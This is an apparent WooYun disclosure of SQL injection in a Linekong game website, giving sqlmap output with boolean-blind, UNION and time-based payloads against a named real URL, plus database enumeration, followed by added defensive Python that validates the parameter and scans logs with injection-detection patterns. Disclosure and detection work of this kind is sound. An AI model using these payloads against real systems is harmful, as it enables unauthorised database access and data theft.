
Vulnerability summary

Defect ID: wooyun-2015-0115362

Title: Linekong (蓝港科技) 《佣兵天下》 SQL injection, round five

Vendor: linekong.com

Author: 风之传说

Submitted: 2015-05-22 10:49

Fixed: 2015-07-09 14:38

Published: 2015-07-09 14:38

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-05-22: Details sent to the vendor, awaiting vendor response
2015-05-25: Vendor confirmed; details disclosed to the vendor only
2015-06-04: Details disclosed to core white hats and domain experts
2015-06-14: Details disclosed to regular white hats
2015-06-24: Details disclosed to intern white hats
2015-07-09: Details disclosed to the public

Brief description:

Linekong (蓝港科技) 《佣兵天下》 SQL injection, round five

Detailed description:

Linekong (蓝港科技) 《佣兵天下》 SQL injection, round five. This is the fifth one; it should be over soon...
SQL injection link:
http://yb.linekong.com//wj_detail.php?userid=20
Probably some big-name hackers have already found this one too...

GET parameter 'userid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 52 HTTP(s) requests:
---
Place: GET
Parameter: userid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: userid=20' AND 2710=2710 AND 'Uzkp'='Uzkp
Type: UNION query
Title: MySQL UNION query (NULL) - 49 columns
Payload: userid=20' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176767a71,0x55414c4777774d776179,0x71717a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: userid=20' AND SLEEP(5) AND 'ERAe'='ERAe
---
[16:36:25] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11


Let's look at the databases; your database naming is quite consistent:

available databases [2]:
[*] information_schema
[*] yb_web


Let's look at the tables, 95 of them:

Database: yb_web
[95 tables]

Proof of vulnerability:

As above

Fix recommendation:

You have experience with this...
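Since the report leaves the fix to the vendor, here is an added example in Python (not code from the report or from Linekong) showing the two defensive halves: a strict allow-list check for `userid`, which rejects all three sqlmap payload classes in the output above, and a small access-log scanner that labels requests carrying those payload classes. The log lines, the client IP and the `/wj_detail.php` path in them are constructed for the example; the UNION payload is shortened.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not taken from the report). The encoded query
# strings reproduce the boolean-blind, UNION and time-based payload shapes.
SAMPLE_LOG = """\
203.0.113.5 - - [22/May/2015:16:36:01 +0800] "GET /wj_detail.php?userid=20 HTTP/1.1" 200 5120
203.0.113.5 - - [22/May/2015:16:36:09 +0800] "GET /wj_detail.php?userid=20%27%20AND%202710%3D2710%20AND%20%27Uzkp%27%3D%27Uzkp HTTP/1.1" 200 5120
203.0.113.5 - - [22/May/2015:16:36:17 +0800] "GET /wj_detail.php?userid=20%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT(0x7176767a71%2C0x55414c4777774d776179%2C0x71717a7171)%23 HTTP/1.1" 200 7300
203.0.113.5 - - [22/May/2015:16:36:25 +0800] "GET /wj_detail.php?userid=20%27%20AND%20SLEEP(5)%20AND%20%27ERAe%27%3D%27ERAe HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# The fix: the endpoint only needs a numeric id, so accept nothing else.
USERID_RE = re.compile(r"[0-9]{1,10}")

# Ordered from most to least specific; the first matching signature wins.
SIGNATURES = [
    ("union-query", re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S)),
    ("time-based-blind", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("boolean-blind", re.compile(r"\b(?:AND|OR)\b\s*\S+\s*=\s*\S+", re.I)),
]


def is_valid_userid(value: str) -> bool:
    """Allow-list check a handler should apply before touching the database."""
    return USERID_RE.fullmatch(value) is not None


def classify(value: str) -> str:
    """Label a rejected userid value by the injection technique it resembles."""
    for label, pattern in SIGNATURES:
        if pattern.search(value):
            return label
    return "unknown-non-numeric"


def scan_access_log(text: str):
    """Return (raw userid value, verdict) for every request carrying userid."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes the values, so signatures see plain SQL.
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for userid in params.get("userid", []):
            verdict = "ok" if is_valid_userid(userid) else classify(userid)
            findings.append((userid, verdict))
    return findings
```

Run `scan_access_log(SAMPLE_LOG)` to see the first request pass and the other three labelled; the same `is_valid_userid` check, applied in the handler, is what stops the query from ever being built from those values.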

Copyright notice: when reposting, please credit the source 风之传说@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 11

Confirmed: 2015-05-25 14:37

Vendor reply:

This game has already been taken offline. Thank you for pointing out the vulnerability; we have started work on shutting down that page.

Latest status:

None yet